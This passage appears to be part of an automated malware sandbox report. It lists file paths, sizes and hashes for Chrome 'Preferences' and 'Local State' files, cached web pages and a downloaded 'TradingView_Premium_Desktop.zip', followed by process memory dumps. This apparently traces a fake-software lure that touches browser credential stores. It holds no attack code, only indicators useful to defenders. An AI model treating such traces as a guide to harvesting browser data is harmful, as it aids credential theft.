                                          SHA512

                                          bce7ec0efb0616d0c80665572f357e7bd5582fd6db64fddec16e218b373bd4a01cc09785cb82d79201d82a8de018970f65773e959bbcfe8e9cca07a2db6e7eab

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          331a4761eaa609f10a8fdbbf2966e280

                                          SHA1

                                          72815bb64762df3287b3449a3e773114bcc8b881

                                          SHA256

                                          7a3cc811a2ba772c01e87e4dde6b950892172fb4800a3ebea76d5c67a1eed546

                                          SHA512

                                          5285cfd9ca3a197a8e0782db2f038fdc282a2de32bb65527b972260a735c26d6f605d3945eef3ba6e5d9cd7fb30cae2e5b7b06903207b56bf6ecb3aaced5867d

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                          Filesize

                                          9KB

                                          MD5

                                          e6c937efe072eeabee5f07e1dc7153e6

                                          SHA1

                                          44875c7da64b59e175db6bf0df891462615fd7c4

                                          SHA256

                                          af51efb3ad8f7855c51d6236ec9247a25b398a575cc27501272998fb6b983703

                                          SHA512

                                          578c055f9868f39be06915fc65b8cce17df9c305575e7c635bef691a6e921bd82a177093e485deaa2460a023dddff05454b2dcb3991dab6fe2757c9d1da8306e

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          196KB

                                          MD5

                                          ecbc3aec19a7a81d09d388baaaff73de

                                          SHA1

                                          a301f5e13619e3caad15cde4e08cf7c45fb4a836

                                          SHA256

                                          350e98506d50065d91d5b9a9e7918a52b687fcfe062eca91b744e4829415851f

                                          SHA512

                                          886b9d4ca11e09c9bba733b958a8274ffe4e4cff3828b6d30fd66dce415610bb984305e94d60be4fa62622d354a980135cad01c2b487e2f9b233a677fda66753

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          197KB

                                          MD5

                                          79ffbe6404e75dd7d50961f96421b899

                                          SHA1

                                          53702b49a6fba9d5ada8146ba26d373286d964c6

                                          SHA256

                                          3bc54f738e0a5fe019999e64627688584ae4fbd760cae6d7fc43c98ee6336ddd

                                          SHA512

                                          b6633293cbb1ecd6982f601aa40c5eb07902aa5369fed98946dbfd4fe1b7f289c53066f063d2ebd0d48914e85f52ae4dc3bca9da09ad205d06b15e3551065249

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          196KB

                                          MD5

                                          55868277796e05a92fdc6d2b01779821

                                          SHA1

                                          8801f980f745a7dae6cdf3f3e9763ececeff1d7f

                                          SHA256

                                          db6496269ae3e6ef424f94020a0760c17f699babce54b22ae2d06e5602932306

                                          SHA512

                                          2485bb72ad2ebce046e1d9df4c3ca5c17fa73fa0801ae22644eac181fc2b40f6570cecdb20ad29125ee23113eceab1db0fe9b20770e7fd2bdb5835272aa04f86

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          197KB

                                          MD5

                                          5632db9acb96e55bb0070d5f4dcf477e

                                          SHA1

                                          cc385a852235cc63f51bd5d2d6b333ae8528b219

                                          SHA256

                                          b95965dd6ff24a107cfd11d4af243c55e682eed4512a7a8c0d28cbf05d880a58

                                          SHA512

                                          2abd994083561f5d92cd6943babf2a92e94dcc98294081501e21886b9328cdbc968b3ca77096f19955a0d91f9855187b71d51a42ff203cb37580b3cafea21ef0

                                        • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

                                          Filesize

                                          250KB

                                          MD5

                                          2753745467e6b156f7bd93dfcc121ed5

                                          SHA1

                                          90bafb5e4d26505c533050e15c45472e361bc1ab

                                          SHA256

                                          43ef620730aa45fd482d4a6d2fcdc204e55bccb99a6ff6a0faf1b3939a57fe1d

                                          SHA512

                                          f81f1c66f1ab1220e42634a21bd1eb03dc29e9a242e2e65969854edc94e7f692885f8340db75918ebd8245a7239087add26384e2e38edc59571c4ce3518dfbcd

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\01ME7Y5O\76561199780418869[1].htm

                                          Filesize

                                          34KB

                                          MD5

                                          13cb861f3eab5cb44ae19b71b0407fe9

                                          SHA1

                                          60127202f14d7de590f1e6f1cb399defcfa69ad8

                                          SHA256

                                          dee4202d705a1ee231bc050fe699255461264c913b9930a783169684055c4505

                                          SHA512

                                          1208513d0e4c71fb093ac5c5750fb7e75e68ec407e30f8fdbd7505a23463787aed699b0589c1bb7e39942e567ae1d91651584191db81833c83919facac8d1a87

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\2A4NI2TY\76561199780418869[1].htm

                                          Filesize

                                          34KB

                                          MD5

                                          3c8d86f1c47c3c3dbc52d8b34dc5b544

                                          SHA1

                                          317b3fd957be2fe9389ec6539b19a35e3abd05ae

                                          SHA256

                                          1dc7fcc79c0c0d3dd7bfcf93851316c3803d24deb420baaf5eb53091a5bd65a9

                                          SHA512

                                          c0e9952e5b5124d3866cbba61d4e2be3ea088487f3990569206311edf0fdd8a4a78e0ca567a581e27e165c75526200cc4cd0fce01011e17e402363c8a02ce79d

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\MF0NALEG\76561199780418869[1].htm

                                          Filesize

                                          34KB

                                          MD5

                                          c4084cb4eabd51945251a0beb132fbe5

                                          SHA1

                                          7f728704814e1e29eab52ca9dcc1113e8a5aa76f

                                          SHA256

                                          824b0fba8b2e0aeb8fc91cc27fe829b5067dfbacbb175695c994455885d932ef

                                          SHA512

                                          621ec68b0a6500d99e120545669b17417b06d74fa55dcd1e0addd48daa8360d602aa4177a937804ae02cd5a6c4dce44b0fea67e3aadf3377d70bca672f6485ed

                                        • C:\Users\Admin\Downloads\TradingView_Premium_Desktop.zip:Zone.Identifier

                                          Filesize

                                          26B

                                          MD5

                                          fbccf14d504b7b2dbcb5a5bda75bd93b

                                          SHA1

                                          d59fc84cdd5217c6cf74785703655f78da6b582b

                                          SHA256

                                          eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                          SHA512

                                          aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                        • memory/788-319-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-321-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-317-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-318-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-320-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-312-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-310-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-311-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-322-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/788-316-0x000002692E520000-0x000002692E521000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/1668-304-0x00000000304C0000-0x000000003071F000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/1668-260-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/1668-259-0x000000000AA00000-0x000000000AA01000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2544-401-0x0000000000760000-0x000000000126F000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2544-421-0x0000000000760000-0x000000000126F000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2544-409-0x00000000308C0000-0x0000000030B1F000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/2544-404-0x0000000000760000-0x000000000126F000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2544-402-0x000000000ACC0000-0x000000000ACC1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2752-220-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2752-352-0x0000000030670000-0x00000000308CF000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/2752-219-0x00000000039C0000-0x00000000039C1000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/2752-218-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/2752-363-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/4572-152-0x0000000000710000-0x0000000000A2D000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/4572-144-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/4572-162-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/4572-164-0x0000000025AE0000-0x0000000025D3F000-memory.dmp

                                          Filesize

                                          2.4MB

                                        • memory/4572-143-0x000000000E730000-0x000000000E731000-memory.dmp

                                          Filesize

                                          4KB

                                        • memory/4572-290-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB

                                        • memory/4572-142-0x0000000000710000-0x0000000000A2D000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/4572-291-0x0000000000710000-0x0000000000A2D000-memory.dmp

                                          Filesize

                                          3.1MB

                                        • memory/4572-123-0x00000000004A0000-0x0000000000FAF000-memory.dmp

                                          Filesize

                                          11.1MB
